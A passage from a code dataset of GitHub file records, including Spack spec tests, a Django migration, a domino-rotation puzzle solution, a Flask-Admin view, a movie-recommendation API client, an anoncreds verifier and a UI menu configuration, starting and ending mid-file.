cppflags=\"-O3\"', 'mpich cppflags=\"-O2\"')\n\n def test_satisfies_virtual(self):\n # Don't use check_satisfies: it checks constrain() too, and\n # you can't constrain a non-virtual by a virtual.\n self.assertTrue(Spec('mpich').satisfies(Spec('mpi')))\n self.assertTrue(Spec('mpich2').satisfies(Spec('mpi')))\n self.assertTrue(Spec('zmpi').satisfies(Spec('mpi')))\n\n def test_satisfies_virtual_dep_with_virtual_constraint(self):\n \"\"\"Ensure we can satisfy virtual constraints when there are multiple\n vdep providers in the specs.\"\"\"\n self.assertTrue(\n Spec('netlib-lapack ^openblas').satisfies(\n 'netlib-lapack ^openblas'))\n self.assertFalse(\n Spec('netlib-lapack ^netlib-blas').satisfies(\n 'netlib-lapack ^openblas'))\n\n self.assertFalse(\n Spec('netlib-lapack ^openblas').satisfies(\n 'netlib-lapack ^netlib-blas'))\n self.assertTrue(\n Spec('netlib-lapack ^netlib-blas').satisfies(\n 'netlib-lapack ^netlib-blas'))\n\n # ========================================================================\n # Indexing specs\n # ========================================================================\n def test_self_index(self):\n s = Spec('callpath')\n self.assertTrue(s['callpath'] == s)\n\n def test_dep_index(self):\n s = Spec('callpath')\n s.normalize()\n\n self.assertTrue(s['callpath'] == s)\n self.assertTrue(type(s['dyninst']) == Spec)\n self.assertTrue(type(s['libdwarf']) == Spec)\n self.assertTrue(type(s['libelf']) == Spec)\n self.assertTrue(type(s['mpi']) == Spec)\n\n self.assertTrue(s['dyninst'].name == 'dyninst')\n self.assertTrue(s['libdwarf'].name == 'libdwarf')\n self.assertTrue(s['libelf'].name == 'libelf')\n self.assertTrue(s['mpi'].name == 'mpi')\n\n def test_spec_contains_deps(self):\n s = Spec('callpath')\n s.normalize()\n self.assertTrue('dyninst' in s)\n self.assertTrue('libdwarf' in s)\n self.assertTrue('libelf' in s)\n self.assertTrue('mpi' in s)\n\n def test_virtual_index(self):\n s = Spec('callpath')\n s.concretize()\n\n s_mpich = Spec('callpath ^mpich')\n s_mpich.concretize()\n\n s_mpich2 = Spec('callpath ^mpich2')\n s_mpich2.concretize()\n\n s_zmpi = Spec('callpath ^zmpi')\n s_zmpi.concretize()\n\n self.assertTrue(s['mpi'].name != 'mpi')\n self.assertTrue(s_mpich['mpi'].name == 'mpich')\n self.assertTrue(s_mpich2['mpi'].name == 'mpich2')\n self.assertTrue(s_zmpi['zmpi'].name == 'zmpi')\n\n for spec in [s, s_mpich, s_mpich2, s_zmpi]:\n self.assertTrue('mpi' in spec)\n\n # ========================================================================\n # Constraints\n # ========================================================================\n def test_constrain_variants(self):\n self.check_constrain('libelf@2.1:2.5', 'libelf@0:2.5', 'libelf@2.1:3')\n self.check_constrain('libelf@2.1:2.5%gcc@4.5:4.6',\n 'libelf@0:2.5%gcc@2:4.6',\n 'libelf@2.1:3%gcc@4.5:4.7')\n\n self.check_constrain('libelf+debug+foo', 'libelf+debug', 'libelf+foo')\n self.check_constrain('libelf+debug+foo',\n 'libelf+debug', 'libelf+debug+foo')\n\n self.check_constrain('libelf debug=2 foo=1',\n 'libelf debug=2', 'libelf foo=1')\n self.check_constrain('libelf debug=2 foo=1',\n 'libelf debug=2', 'libelf debug=2 foo=1')\n\n self.check_constrain('libelf+debug~foo', 'libelf+debug', 'libelf~foo')\n self.check_constrain('libelf+debug~foo',\n 'libelf+debug', 'libelf+debug~foo')\n\n def test_constrain_compiler_flags(self):\n self.check_constrain('libelf cflags=\"-O3\" cppflags=\"-Wall\"',\n 'libelf cflags=\"-O3\"', 'libelf cppflags=\"-Wall\"')\n self.check_constrain('libelf cflags=\"-O3\" cppflags=\"-Wall\"',\n 'libelf cflags=\"-O3\"',\n 'libelf cflags=\"-O3\" cppflags=\"-Wall\"')\n\n def test_constrain_architecture(self):\n self.check_constrain('libelf target=default_target os=default_os',\n 'libelf target=default_target os=default_os',\n 'libelf target=default_target os=default_os')\n self.check_constrain('libelf target=default_target os=default_os',\n 'libelf',\n 'libelf target=default_target os=default_os')\n\n def test_constrain_compiler(self):\n self.check_constrain('libelf %gcc@4.4.7',\n 'libelf %gcc@4.4.7', 'libelf %gcc@4.4.7')\n self.check_constrain('libelf %gcc@4.4.7',\n 'libelf', 'libelf %gcc@4.4.7')\n\n def test_invalid_constraint(self):\n self.check_invalid_constraint('libelf@0:2.0', 'libelf@2.1:3')\n self.check_invalid_constraint(\n 'libelf@0:2.5%gcc@4.8:4.9', 'libelf@2.1:3%gcc@4.5:4.7')\n\n self.check_invalid_constraint('libelf+debug', 'libelf~debug')\n self.check_invalid_constraint('libelf+debug~foo', 'libelf+debug+foo')\n self.check_invalid_constraint('libelf debug=2', 'libelf debug=1')\n\n self.check_invalid_constraint(\n 'libelf cppflags=\"-O3\"', 'libelf cppflags=\"-O2\"')\n self.check_invalid_constraint('libelf platform=test target=be os=be',\n 'libelf target=fe os=fe')\n\n def test_constrain_changed(self):\n self.check_constrain_changed('libelf', '@1.0')\n self.check_constrain_changed('libelf', '@1.0:5.0')\n self.check_constrain_changed('libelf', '%gcc')\n self.check_constrain_changed('libelf%gcc', '%gcc@4.5')\n self.check_constrain_changed('libelf', '+debug')\n self.check_constrain_changed('libelf', '~debug')\n self.check_constrain_changed('libelf', 'debug=2')\n self.check_constrain_changed('libelf', 'cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n self.check_constrain_changed(\n 'libelf', 'target=' + platform.target('default_target').name)\n self.check_constrain_changed(\n 'libelf', 'os=' + platform.operating_system('default_os').name)\n\n def test_constrain_not_changed(self):\n self.check_constrain_not_changed('libelf', 'libelf')\n self.check_constrain_not_changed('libelf@1.0', '@1.0')\n self.check_constrain_not_changed('libelf@1.0:5.0', '@1.0:5.0')\n self.check_constrain_not_changed('libelf%gcc', '%gcc')\n self.check_constrain_not_changed('libelf%gcc@4.5', '%gcc@4.5')\n self.check_constrain_not_changed('libelf+debug', '+debug')\n self.check_constrain_not_changed('libelf~debug', '~debug')\n self.check_constrain_not_changed('libelf debug=2', 'debug=2')\n self.check_constrain_not_changed(\n 'libelf cppflags=\"-O3\"', 'cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_not_changed(\n 'libelf target=' + default_target, 'target=' + default_target)\n\n def test_constrain_dependency_changed(self):\n self.check_constrain_changed('libelf^foo', 'libelf^foo@1.0')\n self.check_constrain_changed('libelf^foo', 'libelf^foo@1.0:5.0')\n self.check_constrain_changed('libelf^foo', 'libelf^foo%gcc')\n self.check_constrain_changed('libelf^foo%gcc', 'libelf^foo%gcc@4.5')\n self.check_constrain_changed('libelf^foo', 'libelf^foo+debug')\n self.check_constrain_changed('libelf^foo', 'libelf^foo~debug')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_changed(\n 'libelf^foo', 'libelf^foo target=' + default_target)\n\n def test_constrain_dependency_not_changed(self):\n self.check_constrain_not_changed('libelf^foo@1.0', 'libelf^foo@1.0')\n self.check_constrain_not_changed(\n 'libelf^foo@1.0:5.0', 'libelf^foo@1.0:5.0')\n self.check_constrain_not_changed('libelf^foo%gcc', 'libelf^foo%gcc')\n self.check_constrain_not_changed(\n 'libelf^foo%gcc@4.5', 'libelf^foo%gcc@4.5')\n self.check_constrain_not_changed(\n 'libelf^foo+debug', 'libelf^foo+debug')\n self.check_constrain_not_changed(\n 'libelf^foo~debug', 'libelf^foo~debug')\n self.check_constrain_not_changed(\n 'libelf^foo cppflags=\"-O3\"', 'libelf^foo cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_not_changed(\n 'libelf^foo target=' + default_target,\n 'libelf^foo target=' + default_target)\n","repo_name":"ekTestuser/testcode","sub_path":"lib/spack/spack/test/spec_semantics.py","file_name":"spec_semantics.py","file_ext":"py","file_size_in_byte":18228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29869242393","text":"users = {\n 'aeinstein': {\n 'first': 'albert',\n 'last': 'einstein',\n 'location': 'princeton',\n },\n\n 'mcurie': {\n 'first': 'marie',\n 'last': 'curie',\n 'location': 'paris',\n },\n }\n\n\nfor username,user_info in users.items():\n print(username)\n print(\"\\n\")\n full_name = f\"{user_info['first']} {user_info['last']}\"\n location = user_info['location']\n\n print(full_name)\n print(location)","repo_name":"gongcy958/js-mine","sub_path":"html/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13042878084","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('persona', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Celula',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('dia_celula', models.CharField(max_length=10)),\n ('hora_celula', models.TimeField()),\n ('direccion_celula', models.CharField(max_length=50)),\n ('encargado_celula', models.ForeignKey(blank=True, null=True, to='persona.Persona')),\n ],\n ),\n migrations.CreateModel(\n name='Miembros_celula',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('rol', models.CharField(max_length=10)),\n ('encargado_celula', models.ForeignKey(blank=True, null=True, to='celula.Celula')),\n ('miembro', models.ForeignKey(blank=True, null=True, to='persona.Persona')),\n ],\n ),\n ]\n","repo_name":"mfsalas/TesisIglesia","sub_path":"apps/celula/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14790229389","text":"# In a row of dominoes, tops[i] and bottoms[i] represent the top and bottom halves of the\n# domino. (A domino is a tile with two numbers from 1 to 6 - one on each half of the tile)\n# We may rotate the i^th domino, so that tops[i] and bottoms[i] swap values.\n# Return the minimum number of rotations so that all the values in tops are the same, or all the\n# values in bottoms are the same.\n# Ex: tops = [1,2,1,4,1,1]\n# bottoms = [5,1,6,1,3,2]\n# result: 2\n# 2 <-> 1 , 4 <-> 1 => 2\n\n# Ex2: tops = [1,2,1,1,1,1]\n# bottoms = [5,1,6,1,3,2]\n# result: 1\n# 2 <-> 1 => 1\n\ndef minDominoRotations(tops, bottoms):\n if len(tops) == 0 or len(bottoms) == 0:\n return -1\n\n for target in [tops[0], bottoms[0]]:\n missingT , missingB = 0, 0\n for i, pair in enumerate(zip(tops, bottoms)):\n top, bottom = pair\n if target != top and target != bottom:\n break\n if top != target: missingT += 1\n elif bottom != target: missingB += 1\n if i == len(tops) - 1:\n return min(missingT, missingB)\n return -1\n \ntops = [1,2,1,4,1,1]\nbottoms = [5,1,6,1,3,2]\nprint(minDominoRotations(tops, bottoms))","repo_name":"SonMichael/algorithm","sub_path":"minimum_domino_rotations.py","file_name":"minimum_domino_rotations.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70316003069","text":"\"\"\"\nEAFP - Eaiser to Forgiveness, No permission\nLBYL - Look Before You Leap\n\"\"\"\n\nmy_list = [1, 2, 3, 4, 5]\n\n# Non pythonic (LBYL - Look before you leap)\nif len(my_list) > 5:\n print(my_list[5])\nelse:\n print('Index does not exist')\n\n# Pythonic (EAFP)\ntry:\n print(my_list[5])\nexcept:\n print('Index does not exist')\n\nprint('*************************************')\n\nimport os\n\nmy_file = \"/path/to/my/file.txt\"\n\n# Race condition (non pythonic)/LBYL\nif os.access(my_file, os.R_OK):\n with open(my_file) as f:\n print(f.read())\nelse:\n print(\"File can't be accessed\")\n\n# No race condition (pythonic)/EAFP\ntry:\n f = open(my_file)\nexcept IOError as e:\n print(\"File can't be accessed\")\nelse:\n with f:\n print(f.read())\n","repo_name":"dattatembare/python-examples","sub_path":"src/advanced/EAFP.py","file_name":"EAFP.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29038422401","text":"import csv\n\n\nclass CSVToList:\n \"\"\"Import data from a .csv file and return it as a list of lists.\"\"\"\n def __init__(self, filename):\n self.list = []\n with open(filename, 'r') as csv_file:\n read_csv = csv.reader(\n csv_file,\n delimiter=',',\n quoting=csv.QUOTE_NONNUMERIC\n )\n for line in read_csv:\n for element in line:\n self.list.append(element)\n","repo_name":"heyuka/WordleCheater","sub_path":"CSVToList.py","file_name":"CSVToList.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28521068145","text":"from flask_admin.actions import action\nfrom flask_admin.form.rules import BaseRule\nfrom flask_admin.model.form import InlineFormAdmin\nfrom markupsafe import Markup\nfrom sqlalchemy.orm import contains_eager, load_only\nfrom wtforms.fields import IntegerField\nfrom wtforms.validators import AnyOf, InputRequired\n\nfrom extensions import celery\nfrom models import Section, TestAttempt\nfrom .helpers import BaseAdminView, CKTextAreaField, Link\n\n\nclass TestAttemptAdmin(BaseAdminView):\n column_searchable_list = (\n 'id', 'user.full_name', 'test_id', 'test.name', 'user_id',\n 'is_complete',\n 'is_graded', 'score',\n 'date')\n\n column_list = column_searchable_list\n can_export = True\n\n column_filters = column_searchable_list\n column_sortable_list = column_searchable_list\n\n @action('approve', 'Mark Complete',\n 'Are you sure you want to complete these tests?')\n def action_approve(self, ids):\n for id in ids:\n complete_test_attempt.delay(id)\n\n\n@celery.task()\ndef complete_test_attempt(test_attempt_id):\n test_attempt = (TestAttempt.query\n .filter(TestAttempt.id == test_attempt_id)\n .options(\n load_only(TestAttempt.user_id, TestAttempt.test_id))\n .one()\n )\n\n TestAttempt.calculate_score_for_test(test_attempt.user_id,\n test_attempt.test_id,\n should_persist=True)\n","repo_name":"harveyslash/backend-cleaned","sub_path":"beatest/beatest_flask_admin/TestAttemptAdmin.py","file_name":"TestAttemptAdmin.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31459914601","text":"\"\"\"This module defines the different data experiments.\n\n Experiments are defined by what data is used when creating models.\n Some subset of the input data is used for each experiment.\n \"\"\"\nimport logging\nimport pathlib\nfrom abc import ABC, abstractmethod\nimport pandas as pd\nfrom aidp.data.groupings import ParkinsonsVsControlGrouping, MsaPspVsPdGrouping, MsaVsPdPspGrouping, PspVsPdMsaGrouping, PspVsMsaGrouping, PdVsMsaGrouping\nfrom aidp.ml.predictors import Predictor, LinearSvcPredictor\nfrom aidp.report.writers import LogReportWriter\nimport itertools\n\nclass DataExperiment(ABC):\n key = None\n groupings = [\n ParkinsonsVsControlGrouping(),\n MsaPspVsPdGrouping(),\n MsaVsPdPspGrouping(),\n PspVsPdMsaGrouping(),\n PspVsMsaGrouping(),\n PdVsMsaGrouping()\n \n ]\n \n report_writer = LogReportWriter()\n\n def __init__(self):\n self._logger = logging.getLogger(__name__)\n\n @abstractmethod\n def filter_data(self, data):\n pass #pragma: no cover\n\n def predict(self, data, model_key):\n self._logger.info(\"Starting model prediction\")\n filtered_data = self.filter_data(data)\n for grouping in self.groupings:\n predictor = Predictor()\n predictor.load_model_from_file(self.key, grouping.key, model_key)\n grouping.predictions = predictor.make_predictions(filtered_data)\n self._logger.info(\"Starting model prediction\")\n\n\n def train(self, data, model_key, save_models=True):\n self._logger.info(\"Starting model training\")\n #TODO: Implement Training mechanism\n filtered_data = self.filter_data(data)\n\n master_outcome_num = []\t\n master_outcome_grp = []\t\n\n for grouping in self.groupings:\n grouping.group_data(filtered_data).grouped_data\n self._logger.debug(\"Training model for grouping: %s\", grouping.key)\n trainer = LinearSvcPredictor()\n trainer.train_model(grouping.grouped_data) \n # Write report of the results\n training_output, validation_output = self.report_writer.write_report(trainer.classifier.best_estimator_, trainer.X_train, trainer.Y_train, trainer.X_test, trainer.Y_test)\n \n # make a group list\n master_outcome_grp.append(grouping.key)\n\n # make a data list\n combined_data = list(itertools.chain.from_iterable([training_output, validation_output])) \n \n # make it to small datafram and transpose\n smalldataframe = pd.DataFrame(combined_data)\n\n # append small dataframs\n master_outcome_num.append(smalldataframe.transpose())\n # Write model to pickle file\n if save_models:\n trainer.save_model_to_file(self.key, grouping.key, model_key)\n # save the master outcome\n Group_df = pd.DataFrame({'Group':master_outcome_grp})\n master_outcome_num_df = pd.concat(master_outcome_num, ignore_index=True)\n \n # column bind x \n master_outcome_num_bigdataframe = pd.concat([Group_df, master_outcome_num_df], axis=1, ignore_index=True)\n parent_path=str(pathlib.Path(__file__).parent.parent.parent)\n filepath = parent_path + \"/\" + str(model_key) + '_' + str(self.key) + '_Training_Performance.csv'\n master_outcome_num_bigdataframe.to_csv(filepath, header= ['Group', 'recall_t', 'precision_t', 'auc_t', 'specificity_t', \n 'npv_t', 'accuracy_t', 'weighted_sensitivity_t', 'weighted_ppv_t', 'weighted_specificity_t' ,\n 'weighted_npv_t', 'weighted_accuracy_t', 'recall_v', 'precision_v', 'auc_v', 'specificity_v', \n 'npv_v', 'accuracy_v', 'weighted_sensitivity_v', 'weighted_ppv_v', 'weighted_specificity_v' ,\n 'weighted_npv_v', 'weighted_accuracy_v'])\n \n self._logger.debug(\"Finished model training\") \n\n def get_results(self):\n # TODO: Add tests\n results = pd.DataFrame()\n for grouping in self.groupings:\n column = '%s_%s (%s Probability)' %(self.key, grouping.key, grouping.positive_label)\n results[column] = grouping.predictions\n\n return results\n\n def __str__(self):\n return type(self).__name__\n\nclass ClinicalOnlyDataExperiment(DataExperiment):\n key = \"clinical\"\n\n def filter_data(self, data):\n standard_data = get_standardized_data(data)\n return standard_data[['GroupID', 'Age', 'Sex', 'UPDRS']]\n\nclass ImagingOnlyDataExperiment(DataExperiment):\n key = \"dmri\"\n\n def filter_data(self, data):\n standard_data = get_standardized_data(data)\n return standard_data.drop(['UPDRS'], axis=1)\n\nclass FullDataExperiment(DataExperiment):\n key = \"both\"\n\n def filter_data(self, data):\n return get_standardized_data(data)\n\n\ndef get_standardized_data(data):\n # TODO: Find a cleaner way to do this\n columns_conf = pathlib.Path(__file__).parent.parent.parent / 'resources/column_names.conf'\n with open(str(columns_conf)) as f:\n columns = f.read().splitlines() \n return data[columns]\n","repo_name":"weienwang/aidp_Kerrick_Testing","sub_path":"aidp/data/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11373321453","text":"import requests\nimport json\nimport os\nfrom dotenv import load_dotenv\n\n#genres list\ngenres = [\n {\"id\":28, \"genre\": \"action\"},\n {\"id\":16, \"genre\": \"animated\"},\n {\"id\":99, \"genre\": \"documentary\"},\n {\"id\":18, \"genre\": \"drama\"},\n {\"id\":10751, \"genre\": \"family\"},\n {\"id\":14, \"genre\": \"fantasy\"},\n {\"id\":36, \"genre\": \"history\"},\n {\"id\":35, \"genre\": \"comedy\"},\n {\"id\":10752, \"genre\": \"war\"},\n {\"id\":80, \"genre\": \"crime\"},\n {\"id\":10402, \"genre\": \"music\"},\n {\"id\":9648, \"genre\": \"mystery\"},\n {\"id\":10749, \"genre\": \"romance\"},\n {\"id\":878, \"genre\": \"sci fi\"},\n {\"id\":27, \"genre\": \"horror\"},\n {\"id\":10770, \"genre\": \"TV movie\"},\n {\"id\":53, \"genre\": \"thriller\"},\n {\"id\":37, \"genre\": \"western\"},\n {\"id\":12, \"genre\": \"adventure\"},\n]\n\n#API key\nload_dotenv()\n\nAPI_KEY = os.getenv(\"ALPHAVANTAGE_API_KEY\")\n\ndef get_movie_recommendations (genre, year, certification, sort):\n \"\"\"\n Fetches movies from the Movies API, for a given genre, year, certification, and sorting criteria.\n\n Params:\n genre (str) the requested genre, like \"action\"\n year (str) the requested year, like \"2020\"\n certification (str) the requested year, like \"PG-13\"\n sort (str) the requested sorting method, like \"popularity\"\n\n Example:\n result = get_movie_recommendations(genre=\"action\", year=\"2020\", certification=\"PG-13\", sort=\"popularity\")\n\n Returns the movie as a parsed resposne with its attributes such as \"original_title\" and \"release_date\".\n \"\"\"\n features = []\n\n #inputs\n for item in genres:\n if genre.lower() == item[\"genre\"]:\n features.append(\"&with_genres=\" + str(item[\"id\"]))\n \n if len(features) == 0:\n features.append(\"\")\n\n features.append(\"&primary_release_year=\" + str(year))\n\n features.append(\"&certification_country=US&certification.lte=\" + str(certification.upper()))\n\n valid_sorts = [\"popularity\", \"revenue\", \"rating\"]\n\n if sort.lower() == valid_sorts[0]:\n features.append(\"&sort_by=popularity.desc\")\n elif sort.lower() == valid_sorts[1]:\n features.append(\"&sort_by=revenue.desc\")\n elif sort.lower() == valid_sorts[2]:\n features.append(\"&sort_by=vote_average.desc&vote_count.gte=1000\")\n\n #API request \n request_url = f\"https://api.themoviedb.org/3/discover/movie?api_key={API_KEY}{features[0]}&with_original_language=en{features[1]}{features[2]}{features[3]}\" \n\n response = requests.get(request_url)\n\n parsed_response = json.loads(response.text)\n\n #output\n if parsed_response[\"total_results\"] < 5:\n return \"Sorry, couldn't find enough movies for those criteria.\"\n exit()\n\n recommendations = []\n\n recommendations.append(parsed_response[\"results\"][0])\n recommendations.append(parsed_response[\"results\"][1])\n recommendations.append(parsed_response[\"results\"][2])\n recommendations.append(parsed_response[\"results\"][3])\n recommendations.append(parsed_response[\"results\"][4])\n\n return recommendations","repo_name":"mcastillo23/movie-finder","sub_path":"app/movie_finder.py","file_name":"movie_finder.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"705263070","text":"from anoncreds.protocol.globals import LARGE_E_START, ITERATIONS, DELTA\nfrom anoncreds.protocol.primary.primary_proof_common import calcTeq, calcTge\nfrom anoncreds.protocol.types import PrimaryEqualProof, \\\n PrimaryPredicateGEProof, PrimaryProof, ID\nfrom anoncreds.protocol.wallet.wallet import Wallet\nfrom config.config import cmod\n\n\nclass PrimaryProofVerifier:\n def __init__(self, wallet: Wallet):\n self._wallet = wallet\n\n async def verify(self, schemaId, cHash, primaryProof: PrimaryProof):\n cH = cmod.integer(cHash)\n THat = await self._verifyEquality(schemaId, cH, primaryProof.eqProof)\n for geProof in primaryProof.geProofs:\n THat += await self._verifyGEPredicate(schemaId, cH, geProof)\n\n return THat\n\n async def _verifyEquality(self, schemaId, cH, proof: PrimaryEqualProof):\n THat = []\n pk = await self._wallet.getPublicKey(ID(schemaId=schemaId))\n attrNames = (await self._wallet.getSchema(ID(schemaId=schemaId))).attrNames\n unrevealedAttrNames = set(attrNames) - set(proof.revealedAttrs.keys())\n\n T1 = calcTeq(pk, proof.Aprime, proof.e, proof.v,\n proof.m, proof.m1, proof.m2,\n unrevealedAttrNames)\n\n Rar = 1 % pk.N\n for attrName in proof.revealedAttrs.keys():\n Rar *= pk.R[str(attrName)] ** proof.revealedAttrs[str(attrName)]\n Rar *= proof.Aprime ** (2 ** LARGE_E_START)\n T2 = (pk.Z / Rar) ** (-1 * cH) % pk.N\n T = T1 * T2 % pk.N\n\n THat.append(T)\n return THat\n\n async def _verifyGEPredicate(self, schemaId, cH,\n proof: PrimaryPredicateGEProof):\n pk = await self._wallet.getPublicKey(ID(schemaId=schemaId))\n v = proof.predicate.value\n\n TauList = calcTge(pk, proof.u, proof.r, proof.mj, proof.alpha, proof.T)\n\n for i in range(0, ITERATIONS):\n TT = proof.T[str(i)] ** (-1 * cH) % pk.N\n TauList[i] = TauList[i] * TT % pk.N\n TauList[ITERATIONS] = TauList[ITERATIONS] * (\n (proof.T[DELTA] * (pk.Z ** v)) ** (-1 * cH)) % pk.N\n TauList[ITERATIONS + 1] = (TauList[ITERATIONS + 1] * (\n proof.T[DELTA] ** (-1 * cH))) % pk.N\n\n return TauList\n","repo_name":"hyperledger-archives/indy-anoncreds","sub_path":"anoncreds/protocol/primary/primary_proof_verifier.py","file_name":"primary_proof_verifier.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"6993353156","text":"from common.reference_frame import PointRef, Ref\nfrom entity_base.image.image_state import ImageStatesFactory\nfrom entity_ui.selector_menu.configurations.common_actions import HighlightCommandAction, HighlightID\nfrom entity_ui.selector_menu.selector_menu_factory import *\nfrom models.path_models.path_segment_state.segment_type import SegmentType\nfrom models.path_models.segment_direction import SegmentDirection\nfrom entities.root_container.field_container.segment.abstract_segment_entity import AbstractSegmentEntity\nfrom entities.root_container.field_container.segment.straight_segment_entity import StraightSegmentEntity\nfrom models.project_history_interface import ProjectHistoryInterface\n\n# When clicked, segment toggles forward/reverse direction\nclass DirectionButtonID(Enum):\n STRAIGHT_FORWARD = 0\n CURVE_FORWARD = 1\n STRAIGHT_REVERSE = 2\n CURVE_REVERSE = 3\nclass InvertDirectionAction(MenuClickAction[StraightSegmentEntity]):\n\n # Get the current direction of the segment\n def getStateID(self, targetEntity: StraightSegmentEntity) -> Enum:\n isStraight = (targetEntity.model.getType() == SegmentType.STRAIGHT)\n if targetEntity.model.getDirection() == SegmentDirection.FORWARD:\n return DirectionButtonID.STRAIGHT_FORWARD if isStraight else DirectionButtonID.CURVE_FORWARD\n else:\n return DirectionButtonID.STRAIGHT_REVERSE if isStraight else DirectionButtonID.CURVE_REVERSE\n\n # Toggle the forward/reverse direction\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n targetEntity.model.toggleDirection()\n\n # make a save state\n ProjectHistoryInterface.getInstance().save()\n\n# When clicked, splits segment and creates temporary node that follows mouse\nclass InsertNodeAction(MenuClickAction[StraightSegmentEntity]):\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n\n segment = targetEntity.model\n\n mouseInches = segment.field.mouseToInches(mouse)\n newNode = segment.path.insertNode(segment, mouseInches, isTemporary = True)\n return newNode\n \n# When clicked, splits segment and creates temporary node that follows mouse\nclass ToggleSegmentTypeAction(MenuClickAction[StraightSegmentEntity]):\n\n # Get the current segment type\n def getStateID(self, targetEntity: StraightSegmentEntity) -> Enum:\n return targetEntity.model.getType()\n\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n \n current = self.getStateID(targetEntity)\n segment = targetEntity.model\n\n if current == SegmentType.STRAIGHT:\n segment.setState(SegmentType.ARC)\n elif current == SegmentType.ARC:\n segment.setState(SegmentType.BEZIER)\n elif current == SegmentType.BEZIER:\n segment.setState(SegmentType.STRAIGHT)\n else:\n raise Exception(\"Invalid segment type\") \n\n # make a save state\n ProjectHistoryInterface.getInstance().save() \n\n\"\"\"\nMenu for segments. Functionality for:\n - revealing command associated with node\n - Toggle segment type\n - Toggle reverse direction\n\"\"\"\ndef configureSegmentMenu() -> MenuDefinition:\n\n segmentDefinition = MenuDefinition(AbstractSegmentEntity)\n\n # Reveals the corresponding command\n states = ImageStatesFactory()\n states.addState(HighlightID.START_HIGHLIGHTING, ImageID.REVEAL_COMMAND, \"Highlight the corresponding command\")\n states.addState(HighlightID.STOP_HIGHLIGHTING, ImageID.REVEAL_COMMAND, \"Stop highlighting the corresponding command\")\n segmentDefinition.add(states.create(), HighlightCommandAction())\n \n # Add a button that toggles the direction of the segment\n states = ImageStatesFactory()\n states.addState(DirectionButtonID.STRAIGHT_FORWARD, ImageID.STRAIGHT_FORWARD, \"Direction: forward\")\n states.addState(DirectionButtonID.STRAIGHT_REVERSE, ImageID.STRAIGHT_REVERSE, \"Direction: reverse\")\n states.addState(DirectionButtonID.CURVE_FORWARD, ImageID.CURVE_LEFT_FORWARD, \"Direction: forward\")\n states.addState(DirectionButtonID.CURVE_REVERSE, ImageID.CURVE_LEFT_REVERSE, \"Direction: reverse\")\n segmentDefinition.add(states.create(), InvertDirectionAction())\n\n # Add a button that toggles segment type\n states = ImageStatesFactory()\n states.addState(SegmentType.STRAIGHT, ImageID.STRAIGHT_SEGMENT, \"Segment type: straight\")\n states.addState(SegmentType.ARC, ImageID.ARC_SEGMENT, \"Segment type: arc\")\n states.addState(SegmentType.BEZIER, ImageID.CURVE_SEGMENT, \"Segment type: bezier\")\n segmentDefinition.add(states.create(), ToggleSegmentTypeAction())\n \n # Inserts a node which splits this segment into two. New node is set to temporary and following mouse position\n states = ImageStatesFactory()\n states.addState(0, ImageID.ADD_NODE, \"Splits this segment to insert a node\")\n segmentDefinition.add(states.create(), InsertNodeAction())\n\n return segmentDefinition","repo_name":"AnselChang/Pathogen4","sub_path":"entity_ui/selector_menu/configurations/segment_menu.py","file_name":"segment_menu.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"73831982267","text":"#!/usr/bin/env python3\n\nimport sys\nimport getopt\nimport numpy as np\nimport pandas as pd\nfrom skimage import io as skio\n\n########################################################\n# main logic function\n#\ndef get_blastema(sample,prefix,ll,lr,rl,rr,exponential_number,wound_only):\n base_file = f'{sample}_masked.tif'\n left_edge_file = f'{sample}_left.tif'\n right_edge_file = f'{sample}_right.tif'\n pos_file = f'{sample}_pos.txt'\n\n base = skio.imread(base_file)\n y, x ,z = np.nonzero(base)\n ymin = np.min(y)\n ymax = np.max(y)\n xmax = np.max(x)\n H,W,D = base.shape\n\n yvals = np.array(range(ymin, ymax+1),dtype=int)\n def mask_one_edge( fname , yvals , ymin,exponential_number,xmax):\n ########################################################\n # get edge points\n #\n masked_edge_data = skio.imread(fname)\n y, x = np.nonzero(masked_edge_data)\n fit_ymin = np.min(y)\n fit_ymax = np.max(y)\n ########################################################\n # fit edge 